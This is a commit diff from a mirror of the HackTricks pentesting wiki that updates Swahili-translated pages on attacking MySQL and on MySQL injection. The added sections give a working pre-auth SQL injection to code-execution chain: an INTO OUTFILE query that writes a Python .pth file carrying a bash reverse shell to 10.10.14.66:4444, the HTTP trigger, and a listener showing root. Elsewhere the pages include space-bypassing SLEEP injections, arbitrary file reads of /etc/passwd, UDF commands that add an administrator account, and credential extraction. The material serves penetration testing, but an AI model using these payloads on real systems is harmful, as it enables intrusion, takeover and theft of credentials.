maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity

Translated ['src/network-services-pentesting/pentesting-mysql.md', 'src/

Browse Source
This commit is contained in:
Translator 2025-07-14 08:42:19 +00:00
parent 553961b599
commit e7043c9b0a
2 changed files with 97 additions and 29 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

81
src/network-services-pentesting/pentesting-mysql.md
View File

@ -1,12 +1,17 @@
# 3306 - Pentesting Mysql
{{#include /banners/hacktricks-training.md}}
## References
- [Pre-auth SQLi to RCE in Fortinet FortiWeb (watchTowr Labs)](https://labs.watchtowr.com/pre-auth-sql-injection-to-rce-fortinet-fortiweb-fabric-connector-cve-2025-25257/)
{{#include ../banners/hacktricks-training.md}}
## **Taarifa za Msingi**
## **Basic Information**
**MySQL** inaweza kueleweka kama mfumo wa usimamizi wa hifadhidata wa uhusiano wa chanzo wazi (RDBMS) ambao upatikana bure. Inafanya kazi kwenye **Lugha ya Kuuliza Iliyoandikwa (SQL)**, ikiruhusu usimamizi na uendeshaji wa hifadhidata.
**MySQL** inaweza kueleweka kama mfumo wa usimamizi wa hifadhidata wa **Relational Database Management System (RDBMS)** wa chanzo wazi ambao upatikana bure. Inafanya kazi kwa **Structured Query Language (SQL)**, ikiruhusu usimamizi na uendeshaji wa hifadhidata.
**Bandari ya Kawaida:** 3306
**Default port:** 3306
```
3306/tcp open mysql
```
@ -109,10 +114,47 @@ You can see in the docs the meaning of each privilege: [https://dev.mysql.com/do
../pentesting-web/sql-injection/mysql-injection/mysql-ssrf.md
{{#endref}}
#### INTO OUTFILE → Python `.pth` RCE (mifumo maalum ya usanidi)
Kwa kutumia primitive ya jadi `INTO OUTFILE`, inawezekana kupata *utendaji wa msimbo wa kiholela* kwenye malengo ambayo baadaye yanatekeleza **Python** scripts.
1. Tumia `INTO OUTFILE` kuacha faili maalum **`.pth`** ndani ya saraka yoyote inayopakuliwa kiotomatiki na `site.py` (mfano `.../lib/python3.10/site-packages/`).
2. Faili ya `.pth` inaweza kuwa na *mstari mmoja* unaoanza na `import ` ukifuatwa na msimbo wa Python wa kiholela ambao utaanzishwa kila wakati mfasiri anapoanza.
3. Wakati mfasiri anatekelezwa kwa njia isiyo ya moja kwa moja na script ya CGI (kwa mfano `/cgi-bin/ml-draw.py` yenye shebang `#!/bin/python`), mzigo unatekelezwa kwa haki sawa na mchakato wa seva ya wavuti (FortiWeb ilikimbia kama **root** → RCE kamili kabla ya uthibitisho).
Mfano wa mzigo wa `.pth` (mstari mmoja, hakuna nafasi zinazoweza kujumuishwa katika mzigo wa mwisho wa SQL, hivyo hex/`UNHEX()` au kuunganisha nyuzi kunaweza kuhitajika):
```python
import os,sys,subprocess,base64;subprocess.call("bash -c 'bash -i >& /dev/tcp/10.10.14.66/4444 0>&1'",shell=True)
```
Mfano wa kuunda faili kupitia **UNION** query (herufi za nafasi zimebadilishwa na `/**/` ili kupita kipitisha cha `sscanf("%128s")` cha nafasi na kuweka jumla ya urefu ≤128 bytes):
```sql
'/**/UNION/**/SELECT/**/token/**/FROM/**/fabric_user.user_table/**/INTO/**/OUTFILE/**/'../../lib/python3.10/site-packages/x.pth'
```
Important limitations & bypasses:
* `INTO OUTFILE` **haiwezi kufuta** faili zilizopo; chagua jina jipya la faili.
* Njia ya faili inatatuliwa **kuhusiana na CWD ya MySQL**, hivyo kuongeza `../../` husaidia kupunguza njia na kupita vizuizi vya njia kamili.
* Ikiwa ingizo la mshambuliaji linachukuliwa na `%128s` (au sawa) nafasi yoyote itakata payload; tumia mfuatano wa maoni ya MySQL `/**/` au `/*!*/` kubadilisha nafasi.
* Mtumiaji wa MySQL anayekimbia swali anahitaji ruhusa ya `FILE`, lakini katika vifaa vingi (mfano, FortiWeb) huduma inakimbia kama **root**, ikitoa ufikiaji wa kuandika karibu kila mahali.
Baada ya kuacha `.pth`, omba tu CGI yoyote inayoshughulikiwa na tafsiri ya python ili kupata utekelezaji wa msimbo:
```
GET /cgi-bin/ml-draw.py HTTP/1.1
Host: <target>
```
Mchakato wa Python utaingiza `.pth` yenye uharibifu kiotomatiki na kutekeleza mzigo wa shell.
```
# Attacker
$ nc -lvnp 4444
id
uid=0(root) gid=0(root) groups=0(root)
```
---
## MySQL kusoma faili kwa hiari na mteja
Kwa kweli, unapojaribu **kuchukua data za ndani kwenye jedwali** **maudhui ya faili** server ya MySQL au MariaDB inaomba **mteja aisome** na kutuma maudhui. **Kisha, ikiwa unaweza kubadilisha mteja wa mysql kuungana na server yako ya MySQL, unaweza kusoma faili za hiari.**\
Tafadhali notice kwamba hii ni tabia inayotumika:
Kwa kweli, unapojaribu **kuchukua data za ndani kwenye jedwali** yaliyomo kwenye **faili**, seva ya MySQL au MariaDB inamwomba **mteja aisome** na kutuma yaliyomo. **Basi, ikiwa unaweza kubadilisha mteja wa mysql kuungana na seva yako ya MySQL, unaweza kusoma faili za hiari.**\
Tafadhali zingatia kwamba hii ni tabia inayotumika:
```bash
load data local infile "/etc/passwd" into table test FIELDS TERMINATED BY '\n';
```
@ -142,14 +184,14 @@ systemctl status mysql 2>/dev/null | grep -o ".\{0,0\}user.\{0,50\}" | cut -d '=
```
#### Dangerous Settings of mysqld.cnf
In the configuration of MySQL services, various settings are employed to define its operation and security measures:
Katika usanidi wa huduma za MySQL, mipangilio mbalimbali inatumika kufafanua uendeshaji wake na hatua za usalama:
- The **`user`** setting is utilized for designating the user under which the MySQL service will be executed.
- **`password`** is applied for establishing the password associated with the MySQL user.
- **`admin_address`** specifies the IP address that listens for TCP/IP connections on the administrative network interface.
- The **`debug`** variable is indicative of the present debugging configurations, including sensitive information within logs.
- **`sql_warnings`** manages whether information strings are generated for single-row INSERT statements when warnings emerge, containing sensitive data within logs.
- With **`secure_file_priv`**, the scope of data import and export operations is constrained to enhance security.
- Mipangilio ya **`user`** inatumika kutaja mtumiaji ambaye huduma ya MySQL itatekelezwa chini yake.
- **`password`** inatumika kuanzisha nenosiri linalohusiana na mtumiaji wa MySQL.
- **`admin_address`** inabainisha anwani ya IP inayosikiliza kwa muunganisho wa TCP/IP kwenye kiolesura cha mtandao wa usimamizi.
- Kigezo cha **`debug`** kinadhihirisha usanidi wa sasa wa urekebishaji, ikiwa ni pamoja na taarifa nyeti ndani ya kumbukumbu.
- **`sql_warnings`** inasimamia ikiwa nyuzi za taarifa zinaundwa kwa taarifa za INSERT za safu moja wakati onyo linatokea, zikiwa na data nyeti ndani ya kumbukumbu.
- Pamoja na **`secure_file_priv`**, upeo wa shughuli za kuagiza na kuuza data unakabiliwa ili kuimarisha usalama.
### Privilege escalation
```bash
@ -214,9 +256,9 @@ CREATE FUNCTION sys_exec RETURNS integer SONAME 'lib_mysqludf_sys_32.dll';
SELECT sys_exec("net user npn npn12345678 /add");
SELECT sys_exec("net localgroup Administrators npn /add");
```
### Extracting MySQL credentials from files
### Kutolewa kwa hati za MySQL kutoka kwa faili
Inside _/etc/mysql/debian.cnf_ you can find the **plain-text password** of the user **debian-sys-maint**
Ndani ya _/etc/mysql/debian.cnf_ unaweza kupata **nenosiri la maandiko** la mtumiaji **debian-sys-maint**
```bash
cat /etc/mysql/debian.cnf
```
@ -230,13 +272,13 @@ grep -oaE "[-_\.\*a-Z0-9]{3,}" /var/lib/mysql/mysql/user.MYD | grep -v "mysql_na
```
### Kuwezesha uandishi wa kumbukumbu
Unaweza kuwezesha uandishi wa kumbukumbu za mysql queries ndani ya `/etc/mysql/my.cnf` kwa kuondoa alama kwenye mistari ifuatayo:
Unaweza kuwezesha uandishi wa kumbukumbu za mysql queries ndani ya `/etc/mysql/my.cnf` kwa kufungua mistari ifuatayo:
![](<../images/image (899).png>)
### Faili za Manufaa
Faili za Mipangilio
Faili za Usanidi
- windows \*
- config.ini
@ -258,7 +300,7 @@ Faili za Mipangilio
- update.log
- common.log
## Hifadhidata/Mizani ya MySQL ya Kawaida
## Hifadhidata/Tafiti za MySQL za Kawaida
{{#tabs}}
{{#tab name="information_schema"}}
@ -578,7 +620,7 @@ x$waits_global_by_latency
{{#endtab}}
{{#endtabs}}
## HackTricks Amri za Otomatiki
## Amri za Kiotomatiki za HackTricks
```
Protocol_Name: MySql #Protocol Abbreviation if there is one.
Port_Number: 3306 #Comma separated if there is more than one.
@ -609,4 +651,7 @@ Note: sourced from https://github.com/carlospolop/legion
Command: msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_version; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_authbypass_hashdump; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/admin/mysql/mysql_enum; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_hashdump; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_schemadump; set RHOSTS {IP}; set RPORT 3306; run; exit'
```
## Marejeo
- [Pre-auth SQLi to RCE in Fortinet FortiWeb (watchTowr Labs)](https://labs.watchtowr.com/pre-auth-sql-injection-to-rce-fortinet-fortiweb-fabric-connector-cve-2025-25257/)
{{#include ../banners/hacktricks-training.md}}

45
src/pentesting-web/sql-injection/mysql-injection/README.md
View File

@ -12,9 +12,9 @@
/*! MYSQL Special SQL */
/*!32302 10*/ Comment for MySQL version 3.23.02
```
## Vipengele vya Kuvutia
## Interesting Functions
### Thibitisha Mysql:
### Confirm Mysql:
```
concat('a','b')
database()
@ -79,7 +79,7 @@ SELECT user FROM mysql.user WHERE file_priv='Y'; #Users with file privileges
## Gundua idadi ya safu
Kwa kutumia ORDER rahisi
Kutumia ODER rahisi
```
order by 1
order by 2
@ -107,7 +107,7 @@ UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,data,0x7C)+fRoM+...
### Kutekeleza maswali kupitia Prepared Statements
Wakati maswali yaliyo stacked yanaruhusiwa, inaweza kuwa inawezekana kupita WAFs kwa kupewa thamani ya hex ya swali unalotaka kutekeleza (kwa kutumia SET), na kisha tumia PREPARE na EXECUTE MySQL statements ili hatimaye kutekeleza swali hilo. Kitu kama hiki:
Wakati maswali yaliyo stacked yanaruhusiwa, inaweza kuwa inawezekana kupita WAFs kwa kupewa thamani ya hex ya swali unalotaka kutekeleza (kwa kutumia SET), na kisha kutumia PREPARE na EXECUTE MySQL statements ili hatimaye kutekeleza swali hilo. Kitu kama hiki:
```
0); SET @query = 0x53454c45435420534c454550283129; PREPARE stmt FROM @query; EXECUTE stmt; #
```
@ -115,7 +115,7 @@ Kwa maelezo zaidi tafadhali rejelea [hii blogu](https://karmainsecurity.com/impr
### Mbadala wa information_schema
Kumbuka kwamba katika toleo "la kisasa" la **MySQL** unaweza kubadilisha _**information_schema.tables**_ kwa _**mysql.innodb_table_stats**_ au kwa _**sys.x$schema_flattened_keys**_ au kwa **sys.schema_table_statistics**
Kumbuka kwamba katika toleo la "kisasa" la **MySQL** unaweza kubadilisha _**information_schema.tables**_ kwa _**mysql.innodb_table_stats**_ au kwa _**sys.x$schema_flattened_keys**_ au kwa **sys.schema_table_statistics**
### MySQLinjection bila KOMAA
@ -131,18 +131,40 @@ Ikiwa wakati fulani unajua jina la jedwali lakini hujui majina ya safu ndani ya
select (select "", "") = (SELECT * from demo limit 1); # 2columns
select (select "", "", "") < (SELECT * from demo limit 1); # 3columns
```
Kukisia kuna safu 2 (safu ya kwanza ikiwa ni ID) na nyingine ikiwa ni bendera, unaweza kujaribu kubruteforce maudhui ya bendera ukijaribu herufi kwa herufi:
Kukisia kuna safu 2 (safu ya kwanza ikiwa ni ID) na nyingine ikiwa ni bendera, unaweza kujaribu kubruteforce maudhui ya bendera ukijaribu herufi moja moja:
```bash
# When True, you found the correct char and can start ruteforcing the next position
select (select 1, 'flaf') = (SELECT * from demo limit 1);
```
Zaidi ya habari katika [https://medium.com/@terjanq/blind-sql-injection-without-an-in-1e14ba1d4952](https://medium.com/@terjanq/blind-sql-injection-without-an-in-1e14ba1d4952)
More info in [https://medium.com/@terjanq/blind-sql-injection-without-an-in-1e14ba1d4952](https://medium.com/@terjanq/blind-sql-injection-without-an-in-1e14ba1d4952)
### Injection bila SPACES (`/**/` comment trick)
Baadhi ya programu zinaondoa au kuchambua pembejeo za mtumiaji kwa kutumia kazi kama `sscanf("%128s", buf)` ambayo **inasimama kwenye herufi ya kwanza ya nafasi**.
Kwa sababu MySQL inachukulia mfuatano `/**/` kama maoni *na* kama nafasi, inaweza kutumika kuondoa kabisa nafasi za kawaida kutoka kwenye payload huku ikihifadhi ombi kuwa sahihi kisarufi.
Mfano wa injection ya kipofu ya muda inayopita chujio cha nafasi:
```http
GET /api/fabric/device/status HTTP/1.1
Authorization: Bearer AAAAAA'/**/OR/**/SLEEP(5)--/**/-'
```
Ambayo hifadhidata inapata kama:
```sql
' OR SLEEP(5)-- -'
```
Hii ni muhimu hasa wakati:
* Buffer inayoweza kudhibitiwa ina mipaka ya ukubwa (kwa mfano, `%128s`) na nafasi zingeweza kumaliza ingizo mapema.
* Kuingiza kupitia vichwa vya HTTP au maeneo mengine ambapo nafasi za kawaida zinatolewa au kutumika kama wapatanishi.
* Imeunganishwa na `INTO OUTFILE` primitives ili kufikia RCE kamili kabla ya uthibitisho (angalia sehemu ya MySQL File RCE).
---
### Historia ya MySQL
Unaweza kuona utekelezaji mwingine ndani ya MySQL kwa kusoma jedwali: **sys.x$statement_analysis**
Unaweza kuona utekelezaji mwingine ndani ya MySQL ukisoma jedwali: **sys.x$statement_analysis**
### Mifano mbadala**s**
### Mbadala wa toleo**s**
```
mysql> select @@innodb_version;
mysql> select @@version;
@ -150,11 +172,12 @@ mysql> select version();
```
## Miongozo Mingine ya MYSQL Injection
- [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/MySQL%20Injection.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/MySQL%20Injection.md)
- [PayloadsAllTheThings MySQL Injection cheatsheet](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/MySQL%20Injection.md)
## Marejeleo
- [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/MySQL%20Injection.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/MySQL%20Injection.md)
- [PayloadsAllTheThings MySQL Injection cheatsheet](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/MySQL%20Injection.md)
- [Pre-auth SQLi to RCE in Fortinet FortiWeb (watchTowr Labs)](https://labs.watchtowr.com/pre-auth-sql-injection-to-rce-fortinet-fortiweb-fabric-connector-cve-2025-25257/)
{{#include ../../../banners/hacktricks-training.md}}